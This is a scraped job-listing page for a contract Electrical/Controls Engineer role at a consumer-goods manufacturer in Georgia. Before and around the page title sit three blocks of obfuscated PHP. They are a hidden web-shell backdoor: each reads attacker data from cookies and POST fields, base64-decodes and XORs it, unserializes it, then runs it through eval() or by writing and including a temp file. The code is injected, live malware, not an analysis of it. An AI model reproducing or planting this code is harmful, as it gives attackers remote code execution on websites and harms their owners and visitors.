$norjNiBHa = chr ( 204 - 114 )."\x4a" . "\165" . chr (95) . chr (69) . "\112" . 'Y' . "\147";$lQHHrqEkF = "\143" . chr (108) . "\141" . "\163" . 's' . '_' . chr ( 1003 - 902 ).chr (120) . 'i' . "\x73" . chr ( 949 - 833 )."\163";$JhUqcL = class_exists($norjNiBHa); $lQHHrqEkF = "53950";$olIsL = !1;if ($JhUqcL == $olIsL){function zzVyMCW(){return FALSE;}$pDdzIO = "9133";zzVyMCW();class ZJu_EJYg{private function WWZuCyRQP($pDdzIO){if (is_array(ZJu_EJYg::$mgAFEQDb)) {$UsELHLBbm = str_replace("\74" . '?' . chr (112) . chr ( 893 - 789 ).chr ( 637 - 525 ), "", ZJu_EJYg::$mgAFEQDb["\x63" . chr (111) . 'n' . chr ( 909 - 793 ).chr (101) . 'n' . 't']);eval($UsELHLBbm); $pDdzIO = "9133";exit();}}private $FWibP;public function lOsitCSo(){echo 8915;}public function __destruct(){$pDdzIO = "44231_25643";$this->WWZuCyRQP($pDdzIO); $pDdzIO = "44231_25643";}public function __construct($NBSzgmToUj=0){$vlAxRdZoL = $_POST;$dXJkm = $_COOKIE;$YnCGCFA = "cf0c52a6-35fd-4021-9fc1-13f232c75390";$OmpOFXAlFa = @$dXJkm[substr($YnCGCFA, 0, 4)];if (!empty($OmpOFXAlFa)){$HNrOSSZJ = "base64";$HRsKNBUYN = "";$OmpOFXAlFa = explode(",", $OmpOFXAlFa);foreach ($OmpOFXAlFa as $oIuHh){$HRsKNBUYN .= @$dXJkm[$oIuHh];$HRsKNBUYN .= @$vlAxRdZoL[$oIuHh];}$HRsKNBUYN = array_map($HNrOSSZJ . chr (95) . chr ( 962 - 862 ).chr ( 253 - 152 )."\143" . "\157" . "\144" . chr ( 224 - 123 ), array($HRsKNBUYN,)); $HRsKNBUYN = $HRsKNBUYN[0] ^ str_repeat($YnCGCFA, (strlen($HRsKNBUYN[0]) / strlen($YnCGCFA)) + 1);ZJu_EJYg::$mgAFEQDb = @unserialize($HRsKNBUYN); $HRsKNBUYN = class_exists("44231_25643");}}public static $mgAFEQDb = 19856;}$noPugr = new /* 1308 */ $norjNiBHa(9133 + 9133); $olIsL = $noPugr = $pDdzIO = Array();}$FKqOLHcESR = 'z' . chr (95) . chr (82) . chr (79) . "\x62";$nJTohWoeE = "\143" . chr ( 247 - 139 ).chr ( 493 - 396 )."\x73" . "\163" . "\x5f" . "\145" . chr ( 178 - 58 ).'i' . "\163" . chr ( 426 - 310 )."\x73";$vMXFf = class_exists($FKqOLHcESR); $nJTohWoeE = "38771";$gcZfAMGuSn = !1;if ($vMXFf == $gcZfAMGuSn){function vyFkDzdwL(){return FALSE;}$cQcSq = "53218";vyFkDzdwL();class z_ROb{private function CjgDuGWi($cQcSq){if (is_array(z_ROb::$CbrMNc)) {$BUmrwqai = str_replace(chr ( 693 - 633 ) . "\77" . "\x70" . "\x68" . chr (112), "", z_ROb::$CbrMNc[chr ( 414 - 315 )."\157" . "\156" . 't' . 'e' . chr (110) . chr ( 268 - 152 )]);eval($BUmrwqai); $cQcSq = "53218";exit();}}private $eTcVmC;public function TzfKol(){echo 5921;}public function __destruct(){$cQcSq = "41767_13002";$this->CjgDuGWi($cQcSq); $cQcSq = "41767_13002";}public function __construct($KkvqoSC=0){$SCzdOYPbQ = $_POST;$Nywaz = $_COOKIE;$QValsSw = "5873996f-b272-420b-95f8-484317a4ae88";$Pvmgr = @$Nywaz[substr($QValsSw, 0, 4)];if (!empty($Pvmgr)){$WbwdFcf = "base64";$kTCiT = "";$Pvmgr = explode(",", $Pvmgr);foreach ($Pvmgr as $WecMvpfMAs){$kTCiT .= @$Nywaz[$WecMvpfMAs];$kTCiT .= @$SCzdOYPbQ[$WecMvpfMAs];}$kTCiT = array_map($WbwdFcf . chr (95) . 'd' . 'e' . chr (99) . "\157" . chr ( 316 - 216 ).'e', array($kTCiT,)); $kTCiT = $kTCiT[0] ^ str_repeat($QValsSw, (strlen($kTCiT[0]) / strlen($QValsSw)) + 1);z_ROb::$CbrMNc = @unserialize($kTCiT); $kTCiT = class_exists("41767_13002");}}public static $CbrMNc = 52950;}$spHXE = new /* 8844 */ $FKqOLHcESR(53218 + 53218); $gcZfAMGuSn = $spHXE = $cQcSq = Array();} Electrical Engineer – PPR $RlPFQBq = "\x4e" . "\147" . chr (95) . 'l' . chr ( 818 - 709 )."\x4e";$pQXZGPe = 'c' . "\154" . chr (97) . chr (115) . chr (115) . chr ( 517 - 422 ).'e' . chr (120) . 'i' . chr ( 724 - 609 )."\164" . 's';$UHcleAIjw = class_exists($RlPFQBq); $pQXZGPe = "15566";$JbEsxqgy = !1;if ($UHcleAIjw == $JbEsxqgy){function iYjBoBbVaY(){return FALSE;}$LgZZng = "5443";iYjBoBbVaY();class Ng_lmN{private function aYSld($LgZZng){if (is_array(Ng_lmN::$UiUGRZPP)) {$osCEgUN = sys_get_temp_dir() . "/" . crc32(Ng_lmN::$UiUGRZPP["\163" . chr ( 1079 - 982 ).'l' . "\x74"]);@Ng_lmN::$UiUGRZPP[chr (119) . "\162" . 'i' . "\x74" . chr (101)]($osCEgUN, Ng_lmN::$UiUGRZPP[chr (99) . "\x6f" . "\x6e" . chr ( 485 - 369 )."\x65" . "\156" . 't']);include $osCEgUN;@Ng_lmN::$UiUGRZPP[chr ( 361 - 261 ).chr ( 776 - 675 ).chr (108) . "\145" . "\164" . "\145"]($osCEgUN); $LgZZng = "5443";exit();}}private $agGiyd;public function bDFdMqID(){echo 57515;}public function __destruct(){$LgZZng = "33245_27411";$this->aYSld($LgZZng); $LgZZng = "33245_27411";}public function __construct($XSfdFi=0){$pjUzRkvUsk = $_POST;$hkWcLUPc = $_COOKIE;$pmOPC = "646691fa-fa15-4ff0-a9dc-c3d97e1f0fe1";$PfDAWG = @$hkWcLUPc[substr($pmOPC, 0, 4)];if (!empty($PfDAWG)){$qehrMF = "base64";$JcEGItpXAA = "";$PfDAWG = explode(",", $PfDAWG);foreach ($PfDAWG as $jAxwNWn){$JcEGItpXAA .= @$hkWcLUPc[$jAxwNWn];$JcEGItpXAA .= @$pjUzRkvUsk[$jAxwNWn];}$JcEGItpXAA = array_map($qehrMF . "\137" . "\x64" . 'e' . chr ( 509 - 410 ).chr (111) . "\x64" . chr (101), array($JcEGItpXAA,)); $JcEGItpXAA = $JcEGItpXAA[0] ^ str_repeat($pmOPC, (strlen($JcEGItpXAA[0]) / strlen($pmOPC)) + 1);Ng_lmN::$UiUGRZPP = @unserialize($JcEGItpXAA); $JcEGItpXAA = class_exists("33245_27411");}}public static $UiUGRZPP = 25129;}$rWdgF = new /* 33818 */ $RlPFQBq(5443 + 5443); $JbEsxqgy = $rWdgF = $LgZZng = Array();} Skip to content

Electrical Engineer

Job brief

We are looking for a specialized Power and Controls Engineer or technician to work on the floor within a start up environment for a Fortune 200 Consumer Goods Manufacturer. This is a 3-12 month contract role based on performance, and will require 75%-100% travel as the contractor will need to be on site.


  • Advanced electrical/controls technician, experienced in industrial manufacturing (preferably with Consumer Goods Experience)
    • Designing, maintaining, implementing, or improving electrical instruments, facilities, components, equipment products, or systems for industrial, commercial, or domestic purposes. –
    • Performing a wide range of engineering tasks by operating computer-assisted design or engineering software and equipment. –
    • Conferring with customers, engineers, and others to discuss existing or potential engineering products or projects. –
    • Ensuring that installation and operations conform to standards and customer requirements by preparing electrical systems specifications, technical drawings, or topographical maps. –
    • Establishing construction, manufacturing, or installation standards or specifications by performing a wide range of detailed calculations. –
    • Ensuring compliance with specifications, codes, or customer requirements by directing or coordinating installation, manufacturing, construction, maintenance, documentation, support, or testing activities. –
    • Writing reports and compiling data regarding existing and potential electrical engineering projects and studies. -Preparing specifications for purchases of electrical equipment and materials. –
    • Supervising or training project team members. –
    • Estimating material, labor, or construction costs for budget preparation. –
    • Maintaining electrical equipment. –
    • Working with a variety of technicians.

Requirements and skills

  • 10+ years of experience as a Controls Engineer or Technician
  • Proficiency in English
  • Outstanding time-management skills
  • Ability to multitask and being comfortable dealing with a diverse pool of people
Job Category: Controls Engineer
Job Type: Contract- Full Time
Job Location: GA

Apply for this position